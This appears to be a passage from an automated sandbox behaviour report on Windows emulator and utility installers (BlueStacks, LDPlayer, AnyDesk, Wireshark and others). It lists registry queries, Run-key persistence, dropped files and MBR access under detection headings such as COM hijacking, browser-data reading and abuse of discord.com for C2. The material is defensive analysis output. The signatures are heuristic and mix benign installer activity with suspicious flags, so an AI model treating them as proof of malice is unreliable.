| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\{F5A019B8-964A-4BC1-9E94-4827D0A6559D}\.cr\vc_redist.x64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | F:\BlueStacks X\BlueStacksWeb.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\Bootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\BlueStacksSetup\BSX-Setup-5.14.22.1003_nxt.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Programs\bluestacks-services\BlueStacksServices.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-PKQAV.tmp\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | F:\BlueStacks X\BlueStacks X.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\BlueStacks X\BlueStacks-Installer_5.14.22.1003_amd64_native.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\BlueStacksInstaller_5.14.22.1003_native_e0175934c4a0a56f1db683585ffd1bcf.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\electron.app.BlueStacks Services = "C:\\Users\\Admin\\AppData\\Local\\Programs\\bluestacks-services\\BlueStacksServices.exe --hidden" | C:\Users\Admin\AppData\Local\Programs\bluestacks-services\BlueStacksServices.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\{8bdfe669-9705-4184-9368-db9ce581e0e7} = "\"C:\\ProgramData\\Package Cache\\{8bdfe669-9705-4184-9368-db9ce581e0e7}\\VC_redist.x64.exe\" /burn.runonce" | C:\Windows\Temp\{C171BC14-EBD8-4819-A425-1258F93C1075}\.be\VC_redist.x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o" | C:\Windows\system32\rundll32.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\F: | C:\Windows\SysWOW64\takeown.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\7zS0CE5F193\BlueStacksInstaller.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Downloads\smartgaga-android-emulator-1.1.646.1-installer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\BlueStacksInstaller.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\F: | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\F: | C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\SysWOW64\takeown.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\SysWOW64\takeown.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\SysWOW64\WScript.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Modifies powershell logging option
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\nso2985.tmp\InstallReport.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | F:\ProjectTitan\Engine\ProjectTitan.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | F:\ProjectTitan\Engine\TitanService.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks system information in the registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\117308CCCD9C93758827D7CC85BB135E | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D84E548583BE1EE7DB5A935821009D26_5B98B6CD6E69202676965CF5B0E2A7A7 | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| File opened for modification | C:\Windows\system32\mfcm140u.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140rus.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfcm140u.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{b3eee243-522a-9940-9ae5-75afc7ec1808} | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_06C655286541813B46B1E7FC734ACAF8 | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BAEBE581FCB73249406FC21094EA252E_BC0CE803EF41A748738619ED7838EEFC | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D84E548583BE1EE7DB5A935821009D26_5B98B6CD6E69202676965CF5B0E2A7A7 | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| File opened for modification | C:\Windows\system32\msvcp140_2.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140deu.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140rus.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140chs.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netnwifi.inf_amd64_a2bfd066656fe297\netnwifi.PNF | C:\Program Files\Npcap\NPFInstall.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_06C655286541813B46B1E7FC734ACAF8 | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1B1401C7EC8E96BC79CBFD92F9DF762D_E35D496D1CD0B884BEBCAFED0FE61600 | C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\42B9A473B4DAF01285A36B4D3C7B1662_38924EDF39D8802D6946FB22E5DD0835 | C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netserv.inf_amd64_73adce5afe861093\netserv.PNF | C:\Program Files\Npcap\NPFInstall.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\229169D96B9C20761B929D428962A0A2_E724097EF7BBA8B1CB3228AA4D2ED312 | C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_888F944E43EFCB6810561095CD83E20A | C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_888F944E43EFCB6810561095CD83E20A | C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\42B9A473B4DAF01285A36B4D3C7B1662_178C086B699FD6C56B804AF3EF759CB5 | C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe | N/A |
| File created | C:\Windows\system32\Npcap\WlanHelper.exe | C:\Program Files\Wireshark\npcap-1.78.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\npcap.inf_amd64_8bd33bba90c49bc9\NPCAP.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3E3E9689537B6B136ECF210088069D55_A925FAB5FFC3CEDB8E62B2DCCBBBB4F2 | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DDD60D479047B9472722C3115985BD00 | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| File opened for modification | C:\Windows\system32\concrt140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\msvcp140_atomic_wait.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140enu.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140fra.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140fra.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\206932163209AD483A44477E28192474 | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| File created | C:\Windows\SysWOW64\Npcap\wpcap.dll | C:\Program Files\Wireshark\npcap-1.78.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{b3eee243-522a-9940-9ae5-75afc7ec1808}\SETE392.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{b3eee243-522a-9940-9ae5-75afc7ec1808}\SETE391.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netrass.inf_amd64_7f701cb29b5389d3\netrass.PNF | C:\Program Files\Npcap\NPFInstall.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DDD60D479047B9472722C3115985BD00 | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6 | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\AF360AACB1570042DEFBC833317997D0_C2A57436D76F24DF346063556964EF64 | C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140ita.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\86844F70250DD8EF225D6B4178798C21_1FB605FD2412C4F94AD934D8134A28AC | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A37B8BA80004D3266CB4D93B2052DC10_5F5F520ABA6509FB550A7DDEB645B50F | C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_56DB209C155B5A05FCBF555DF7E6D1BB | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_96B11076AA4494A4A6143129F61AEC8B | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\229169D96B9C20761B929D428962A0A2_E724097EF7BBA8B1CB3228AA4D2ED312 | C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\AF360AACB1570042DEFBC833317997D0_C2A57436D76F24DF346063556964EF64 | C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\AEACCDA8653DD8D7B2EA32F21D15D44F_05097737526E5F006B53271077572A3C | C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe | N/A |
| File created | C:\Windows\system32\msvcp140_1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140esn.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141 | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_466BAFE78D4077069B6C3828315C7C8D | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C3E814D1CB223AFCD58214D14C3B7EAB | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_93702E680A5530C052C8D2BA33A2225F | C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netpacer.inf_amd64_7d294c7fa012d315\netpacer.PNF | C:\Program Files\Npcap\NPFInstall.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BAEBE581FCB73249406FC21094EA252E_BC0CE803EF41A748738619ED7838EEFC | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\BlueStacks_nxt\HD-Common.dll | C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe | N/A |
| File created | C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\sw.pak | C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe | N/A |
| File created | C:\Program Files\McAfee\Temp1169930912\wa_logo2.png | C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component1_extract\installer.exe | N/A |
| File created | C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-options-pl-PL.js | C:\Program Files\McAfee\Temp1169930912\installer.exe | N/A |
| File opened for modification | C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\hi.pak | C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe | N/A |
| File created | C:\Program Files\Wireshark\snmp\mibs\T11-FC-FSPF-MIB | C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe | N/A |
| File created | C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-overlay-fr-FR.js | C:\Program Files\McAfee\Temp1169930912\installer.exe | N/A |
| File created | C:\Program Files\BlueStacks_nxt\QtGraphicalEffects\FastBlur.qml | C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe | N/A |
| File opened for modification | C:\Program Files\BlueStacks_nxt\QtGraphicalEffects\plugins.qmltypes | C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe | N/A |
| File created | C:\Program Files\Wireshark\networkinformation\qnetworklistmanager.dll | C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe | N/A |
| File created | C:\Program Files\McAfee\Temp1169930912\jslang\wa-res-install-nb-NO.js | C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component1_extract\installer.exe | N/A |
| File created | C:\Program Files\Wireshark\Qt6Gui.dll | C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe | N/A |
| File created | C:\Program Files\Wireshark\snmp\mibs\[email protected] | C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe | N/A |
| File created | C:\Program Files\Wireshark\Wireshark User's Guide\ChCapManageInterfacesSection.html | C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe | N/A |
| File created | C:\Program Files\Wireshark\Wireshark User's Guide\ChWirelessBluetoothATTServerAttributes.html | C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe | N/A |
| File created | C:\Program Files\Wireshark\Wireshark User's Guide\images\ws-csp-statistics.png | C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe | N/A |
| File created | C:\Program Files\BlueStacks_nxt\libssl-1_1-x64.dll | C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe | N/A |
| File opened for modification | C:\Program Files\BlueStacks_nxt\Assets | C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe | N/A |
| File created | C:\Program Files\Wireshark\radius\dictionary.rfc2869 | C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe | N/A |
| File created | C:\Program Files\Wireshark\snmp\mibs\[email protected] | C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe | N/A |
| File created | C:\Program Files\McAfee\WebAdvisor\jslang\new-tab-res-toast-zh-TW.js | C:\Program Files\McAfee\Temp1169930912\installer.exe | N/A |
| File opened for modification | C:\Program Files\BlueStacks_nxt\QtGraphicalEffects\InnerShadow.qml | C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe | N/A |
| File created | C:\Program Files\Wireshark\snmp\mibs\DISMAN-PING-MIB | C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe | N/A |
| File created | C:\Program Files\Wireshark\radius\dictionary.iana | C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe | N/A |
| File created | C:\Program Files\Wireshark\udpdump.html | C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe | N/A |
| File created | C:\Program Files\McAfee\WebAdvisor\MFW\packages_web_view\webadvisor\wa-ext-install-toast.js | C:\Program Files\McAfee\Temp1169930912\installer.exe | N/A |
| File created | C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-upsell-toast-pt-BR.js | C:\Program Files\McAfee\Temp1169930912\installer.exe | N/A |
| File created | C:\Program Files\Wireshark\README.windows.txt | C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe | N/A |
| File created | C:\Program Files\Wireshark\diameter\Juniper.xml | C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe | N/A |
| File created | C:\Program Files\McAfee\WebAdvisor\MFW\packages_web_view\webadvisor\wa-controller-checklist.js | C:\Program Files\McAfee\Temp1169930912\installer.exe | N/A |
| File created | C:\Program Files\ReasonLabs\EPP\NAudio.dll | C:\Users\Admin\AppData\Local\Temp\7zS0779229A\UnifiedStub-installer.exe | N/A |
| File created | C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\pl.pak | C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe | N/A |
| File created | C:\Program Files\Wireshark\radius\dictionary.airespace | C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe | N/A |
| File created | C:\Program Files\Wireshark\radius\dictionary.bt | C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe | N/A |
| File created | C:\Program Files\Wireshark\snmp\mibs\TCP-ESTATS-MIB | C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe | N/A |
| File created | C:\Program Files\Wireshark\Wireshark User's Guide\ChPresContextList.html | C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe | N/A |
| File opened for modification | C:\Program Files\BlueStacks_nxt\QtGraphicalEffects\HueSaturation.qml | C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe | N/A |
| File opened for modification | C:\Program Files\BlueStacks_nxt\QtQuick\Layouts\qquicklayoutsplugin.dll | C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe | N/A |
| File opened for modification | C:\Program Files\BlueStacks_nxt\mediaservice | C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe | N/A |
| File created | C:\Program Files\Wireshark\radius\dictionary.itk | C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe | N/A |
| File created | C:\Program Files\Wireshark\snmp\mibs\SLS-NEGOTIATION-PIB-orig | C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe | N/A |
| File created | C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-overlay-fi-FI.js | C:\Program Files\McAfee\Temp1169930912\installer.exe | N/A |
| File created | C:\Program Files\Wireshark\snmp\mibs\FRSLD-MIB | C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe | N/A |
| File created | C:\Program Files\Wireshark\snmp\mibs\MPLS-LDP-STD-MIB | C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe | N/A |
| File created | C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-uninstall-pt-PT.js | C:\Program Files\McAfee\Temp1169930912\installer.exe | N/A |
| File created | C:\Program Files\ldplayer9box\api-ms-win-crt-process-l1-1-0.dll | F:\LDPlayer\LDPlayer9\dnrepairer.exe | N/A |
| File created | C:\Program Files\BlueStacks_nxt\Qt5Multimedia.dll | C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe | N/A |
| File opened for modification | C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\ru.pak | C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe | N/A |
| File created | C:\Program Files\BlueStacks_nxt\QtGraphicalEffects\ThresholdMask.qml | C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe | N/A |
| File created | C:\Program Files\Wireshark\snmp\mibs\DS1-MIB | C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe | N/A |
| File created | C:\Program Files\Wireshark\snmp\mibs\HC-RMON-MIB | C:\Users\Admin\Downloads\Wireshark-4.2.5-x64.exe | N/A |
| File created | C:\Program Files\ldplayer9box\NetLwfUninstall.exe | F:\LDPlayer\LDPlayer9\dnrepairer.exe | N/A |
